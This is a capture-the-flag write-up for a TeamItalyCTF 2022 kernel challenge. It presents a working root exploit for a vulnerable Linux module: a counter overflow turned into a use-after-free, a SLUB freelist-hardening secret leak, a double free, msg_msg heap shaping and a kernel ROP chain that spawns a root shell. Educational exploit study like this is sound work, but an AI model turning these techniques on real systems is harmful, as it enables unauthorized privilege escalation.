Kernel - Family recipes

Category: Kernel Pwn
Vuln type: use-after-free / SLUB / freelist manipulation / KROP
Solves: 1

This writeup documents my solution for this challenge, part of the TeamItalyCTF 2022. The challenge contains a kernel module that controls a small device exposing an allocator for “recipes”. The vuln chain abuses an unsigned-char counter overflow + krealloc semantics to create a use-after-free of the recipes_list array, then corrupts kernel freelists within the SLUB allocator and eventually overlaps a controlled allocation over the stack to install a ROP chain that calls prepare_kernel_cred(0) and commit_creds() elevating the execution to ring 0 and iretq’s back to a userspace get_shell().

The challenge

Target: x86_64 Linux kernel built without KASLR
Kernel config: CONFIG_SLAB_FREELIST_HARDENED present.
No KASAN, SMEP or SMAP protections.

This challenge shipped a tiny Linux kernel module that registers a device /dev/chall acting as a "recipe manager." Allows you to allocate recipes, delete them, and read their contents.

The central data structure is a global manager object with two fields:

struct manager {
    unsigned char num_of_recipes;
    recipe_t **recipes_list;
};

The manager is responsible for keeping pointers to recipe_t objects with the following layout:

typedef struct recipe {
    char *buf;
    unsigned long bufsize;
    unsigned int public;
    uid_t owner_uid;
} recipe_t;

The code section responsible for the allocation of a new recipe is the most interesting part:

idx = manager.num_of_recipes;
manager.num_of_recipes++;

if (manager.recipes_list == NULL) {
    tmp = kmalloc(sizeof(recipe_t *) * manager.num_of_recipes, GFP_KERNEL);
} else {
    tmp = krealloc(manager.recipes_list,
                  sizeof(recipe_t *) * manager.num_of_recipes,
                  GFP_KERNEL);
}

if (ZERO_OR_NULL_PTR(tmp)) {
    printk(KERN_INFO "[ERR] (Re)allocation failed\n");
    manager.num_of_recipes--;
    goto error;
}

manager.recipes_list = tmp;

recipe = kmalloc(sizeof(recipe_t), GFP_KERNEL);
buf = kmalloc(request.alloc.bufsize + 1, GFP_KERNEL);
recipe->buf = buf;
manager.recipes_list[idx] = recipe;

Here we have the main bug of the module. Notice how num_of_recipes is only an unsigned char. The number of recipes allocation in not limited, so after 255 allocations, incrementing the counter wraps it back to 0. That means:

krealloc(manager.recipes_list, sizeof(recipe_t*) * 0, GFP_KERNEL);

This is effectively krealloc(ptr, 0), which is defined to free the old allocation and return either NULL or a tiny pointer. If it returns NULL, the code logs an error but crucially does not clear the stale pointer. manager.recipes_list still points to freed memory, and the module continues to index into it. This dangling pointer is the entry point to exploitation.

Exploit

Since this challenge is build without KASLR enabled, the address of functions, gadgets, and heap objects can be easily found reading the file /proc/kallsyms.

To make the exploitation faster and I implemented small wrappers for the device operations. Each one mirrors a kernel ioctl but hides the boilerplate, making it easier to chain primitives: * alloc_recipe allocates a recipe and writes attacker-controlled data. * free_recipe deletes a recipe at a given index. * read_recipe returns raw bytes from a recipe’s buffer, perfect for leaking heap metadata. * info_recipe returns the metadata of the recipe such as bufsize,owner_uid and public.

void dev_alloc(char* buf, unsigned long bufsize, unsigned int public ){
    request_t req;
    req.alloc.buf = buf;
    req.alloc.bufsize = bufsize;
    req.alloc.public = public;
    if (ioctl(fd, CMD_ALLOC, &req) < 0) 
        perror("ioctl CMD_ALLOC");
}

void dev_delete(unsigned long idx ){
    request_t req;
    req.delete.idx = idx;
    if (ioctl(fd, CMD_DELETE, &req) < 0) 
        perror("ioctl CMD_DELETE");
}

void dev_read(char* buf, unsigned long bufsize, unsigned long idx ){
    request_t req;
    req.read.buf = buf;
    req.read.bufsize = bufsize;
    req.read.idx = idx;
    if (ioctl(fd, CMD_READ, &req) < 0) 
        perror("ioctl CMD_READ");
}

request_t dev_info(unsigned long idx ){
    request_t req;
    req.info.idx = idx;
    if (ioctl(fd, CMD_INFO, &req) < 0) 
        perror("ioctl CMD_INFO");
    return req;
}

Integer overflow and UAF

Step one is simple: allocate 255 + 1 recipes .

After the 256th allocation, the counter overflows, krealloc(..., 0) frees the array, and recipes_list dangles. From now on, any operation that expects a valid pointer will instead dereference freed memory. The size and content of the payload is not important for now.

for (int i = 0; i < 256; i++) {
    alloc_recipe(fd, 0x100, payload);
}

At this point the array has grew past 1k Bytes by some time and ended up allocated on the 2k general-purpouse slab.

The freed slot is linked back on the slab freelist, ready to be reused by attacker-controlled allocations.

Overlapping controlled data

Given that each recipe also contains a recipe->buf allocated with user-chosen size, we can allocate new buffers that overlap with the freed recipes_list region. By doing this, writing into the buffer effectively overwrites entries of the recipes_list array.

In order for our buffer to be allocated from the 2k slab free list we need to request an object of at least 1025 Bytes, and even tough the MAX_BUFSIZE is 1024 the kernel module adds 1 Byte for the string terminator 0x00 allowing us to request from kmalloc exactly 1025 Bytes

buf = kmalloc(sizeof(char) * request.alloc.bufsize + 1, GFP_KERNEL);

That gives us control over the first 128 recipes_list[i] pointers. If we set one to point to a fake recipe_t under our control, the module will happily use it.

Leaking the freelist secret

The objective now is to insert a fake chunk into the free list. However, due to a mitigation built into the kernel, we cannot directly modify the FD pointer of a freed object. We first need to obfuscate the pointer to the target memory we want to overlap. To do that, we must leak the secret used for the obfuscation.

The mitigation is CONFIG_SLAB_FREELIST_HARDENED and by reading the linux source code we can easily see what it does. Instead of storing the raw pointer next inside the free object, the allocator xors it with its address in memory and a per-cache or per-cpu secret (obf = next ^ swab(&next) ^ secret) before writing it to memory; When the allocator consumes the pointer the same operation is perfomed.

The swab function simply performs a byte-wise reversal of the pointer’s value. Each byte is mirrored end-to-end, so the most significant byte becomes the least significant, the second most significant becomes the second least, and so on.

// obfuscation
stored = next ^ swab(&next) ^ secret
// deobfuscation
next = stored ^ swab(&stored) ^ secret

static inline freeptr_t freelist_ptr_encode(const struct kmem_cache *s,
                        void *ptr, unsigned long ptr_addr)
{
    unsigned long encoded;

#ifdef CONFIG_SLAB_FREELIST_HARDENED
    encoded = (unsigned long)ptr ^ s->random ^ swab(ptr_addr);
#else
    encoded = (unsigned long)ptr;
#endif
    return (freeptr_t){.v = encoded};
}

There is a subtle problem here. If we can leak the content of the last free chunk in the free list, we already know that the original next pointer for that chunk is 0x0 (since it’s the end of the list). If we also know the address of that chunk, we can trivially derive the secret used in the pointer obfuscation:

secret = obfuscated ^ swab(address) ^ 0x00

In our case, given that KASLR is disabled, it's even easier because we already know the adress of every FD pointer we know where it is pointing to in memory. All we need is a way to read the content of a free object.

Luckily, the module provides a read primitive that allows to leak arbitrary meory locations:

    } else if (cmd == CMD_INFO) {

        request.info.bufsize = recipe->bufsize;
        request.info.owner_uid = recipe->owner_uid;
        request.info.public = recipe->public;

        if (copy_to_user(( request_t*)arg, (const request_t*)&request, sizeof(request))) {
            printk(KERN_INFO "[CHALL] [ERR] Copy to user failed\n");
            goto error;
        }

If we arrange one of the recipes_list[idx] we overwrote to point into freed slab memory, so that the recipe->bufsize overlaps with obfuscated freelist pointer, we can call dev_info() to leak the pointer. Given that KASLR is diabled we also know the address of the chunk we freed and where it points to, we can always reverse the encoding and recover the secret.

    memset(msg, 0x41, 1024);    
    *((unsigned long*)msg+0) = 0xffff888003b75bf8; // ptr to the leak (minus 0x8) 
    dev_alloc(msg,1024,1);

    // Leaking the obfuscated pointer in the freelist 
    request_t req = dev_info(0);

    // extracting secret 
    unsigned long encrypted = req.info.bufsize;
    unsigned long decrypted = 0xffff888003b76000;
    unsigned long position = 0xffff888003b75c00;
    unsigned long secret = encrypted ^ swab64(position) ^  decrypted;

Forging a freelist entry

Given that we can't modify recipes already allocated, if we want to inject into the freelist our pointer we now also need a double-free, that would allow us to request the same object twice, changing the next pointer and inserting our fake chunk into the freelist.

To achieve this we could simply overwrite entries in recipes_list[] so the module ends up calling kfree() on the same object twice (i.e., point two different array slots at the same address and call CMD_DELETE on both). Before that we need to consider the following mitigation present in the kernel function set_freepointer() invoked by kfree()

static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
    unsigned long freeptr_addr = (unsigned long)object + s->offset;

#ifdef CONFIG_SLAB_FREELIST_HARDENED
    BUG_ON(object == fp); /* naive detection of double free or corruption */
#endif

    freeptr_addr = (unsigned long)kasan_reset_tag((void *)freeptr_addr);
    *(freeptr_t *)freeptr_addr = freelist_ptr_encode(s, fp, freeptr_addr);
}

That BUG_ON(object == fp) simply compares the address being freed with the current freelist head — it will catch the trivial case where kfree(obj) is immediately followed by kfree(obj) again. But it doesn’t catch more subtle sequences where the same object is freed twice with other frees happening in-between, because the freelist head will have changed.

To exploit reliably we can craft a fake recipe_t structure intentionally placed at the start of the (freed) array and then make another array entry point to it. The fake struct we write into the overlapped recipes_list region looks like a normal recipe_t but with recipe->buf set to a pointer of another valid memory location. The freeing order matters: we first free the overlapping object that occupies the beginning of the array (so the slot with our fake struct is now over a free object), and then we delete the fake recipe struct itself.

Because the fake recipe has a valid recipe->buf pointer, the program frees the buffer first and only then frees the struct body. Crucially, the immediate check BUG_ON(object == fp) does not trigger because these last two frees are not targeting the same memory location.

Once that forged entry sits in the freelist, normal kmallocs of the same size will eventually pop it and return an object at that location without further checks.

    // Allocated recipe buffer over the array clearing 128 entries and inserting fake struct
    memset(msg, 0x41, 1024);    
    *((unsigned long*)msg) = 0xffff888003b75800;   //
    *((unsigned long*)msg+1) = 8;                  // fake struct to do the double free
    *((unsigned long*)msg+2) = 0x000003e800000001; // 
    *((unsigned long*)msg+4) = 0xffff888003b75000; // ptr to the fake struct for the double free (idx 4)
    *((unsigned long*)msg+6) = 0xffff888003b75bf8; // ptr to the fake struct for the leak (idx 6)
    dev_alloc(msg,1024,1);

    // Leaking the obfuscated pointer in the freelist
    request_t req = dev_info(6);

    // extracting secret 
    unsigned long encrypted = req.info.bufsize;
    unsigned long decrypted = 0xffff888003b76000;
    unsigned long position = 0xffff888003b75c00;
    unsigned long secret = encrypted ^ swab64(position) ^  decrypted;

    // freeing the object overlapping the array
    dev_delete(254);
    // DOUBLE FREE! Freed again the second last free chunk and then last chunk 
    dev_delete(4);

alt text

Allocating onto the kernel stack

At this stage, the object at the head of the 2k freelist is linked twice in the list. We now need to request it once and modify the content of its FD pointer. Allocating a regular recipe here won’t work because we are allowed to write a maximum of 1024 bytes so the position of the FD pointer is out of reach.

Fortunately, we can leverage other kernel structures, such as msg_msg. Using IPC messages, we have full control over the size of the msg_msg struct allocated when enqueuing a message. And given that contains user input, it will be requested from the same general purpose cache.

The FD pointer is located at offset 0x400. Accounting for the msg_msg header (0x30) and the extra 8 bytes expected by msgsnd at the start of the message, the final offset becomes: 0x400 - 0x30 + 0x8 = 0x3d8

Without KASLR, we can insert an object into the freelist such that it lands exactly on the stack, starting from the return address of copy_from_user().

    unsigned long stack_end = 0xffffc900001d0000;
    unsigned long target = stack_end- 0x410;
    unsigned long obfuscated = target ^ swab64(0xffff888003b75400) ^ secret;

    memset(msg, 0x41, 984);
    *(unsigned long*)(msg+974 + 8) = obfuscated;
    key_t key = ftok("/", 0);
    printf("key:%d\n",key);
    int msgid = msgget(key, 0666 | IPC_CREAT);
    if (msgid == -1) { perror("msgget"); }
    if (msgsnd(msgid, &msg, 984, 0)== -1) {
        perror("msgsnd");
    }

Kernel ROP

Before triggering the ROP chain we need to save the program state for the iretq that will pop CS SS RSP and RFLAGS.

long user_cs;
long user_ss;
long user_sp;
long user_rflags;
void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}
save_state();

We also need an handler to execute when returning back to userland.

void get_shell(int sig){
    puts("[*] Returned to userland");
    system("/bin/sh");
}
signal(SIGSEGV, get_shell);

Now we can create more recipes and request objects of size 2k until we end up on the stack and insert a ROP that does the following:

Setup & call prepare_kernel_cred(0) that returns a cred * in rax representing root credentials.
Call commit_creds(rax) to replace the current task credentials with the new root credentials.
Call spin_unlock(&lock) function to release the kernel lock that is still present on lock
Execute swapgs; ret to restore the GS base appropriate for returning to user mode (required before an iretq).
Return to userland safely with iretq building a fake iretq stack frame on the kernel stack: [RIP = get_shell, CS, RFLAGS, RSP, SS].

    memset(msg, 0xff, 1024);    
    *(unsigned long*)(msg) = 0xffffffff8106ab4d;      // pop rdi; ret;
    unsigned long* rop = (unsigned long*)(msg+688);
    int k = 0;

    rop[k++] = 0xffffffff8106ab4d;      // pop rdi; ret;
    rop[k++] = 0x00;
    rop[k++] = 0xffffffff81096110;      // prepare_kernel_cred(0) 

    rop[k++] = 0xffffffff8102b013;      // pop rcx; ret;
    rop[k++] = stack_end- 0x410;        // where i put the "pop rdi" gadget address before
    rop[k++] = 0xffffffff812d5b52;      // push rax; jmp qword ptr [rcx];
    rop[k++] = 0xffffffff81095c30;      // commit_creds(prepare_kernel_cred(0))

    rop[k++] = 0xffffffff8106ab4d;      // pop rdi; ret;
    rop[k++] = 0xffffffffc00024d0;      // &lock;
    rop[k++] = 0xffffffff81ca0580;      // spin_unlock

    rop[k++] = 0xffffffff81c93263;      // swapgs; ret
    rop[k++] = 0xffffffff8102b4df;      // iretq; ret;
    rop[k++] = (unsigned long)get_shell;
    rop[k++] = user_cs;
    rop[k++] = user_rflags;
    rop[k++] = user_sp;
    rop[k++] = user_ss;

    dev_alloc(msg,1024,1);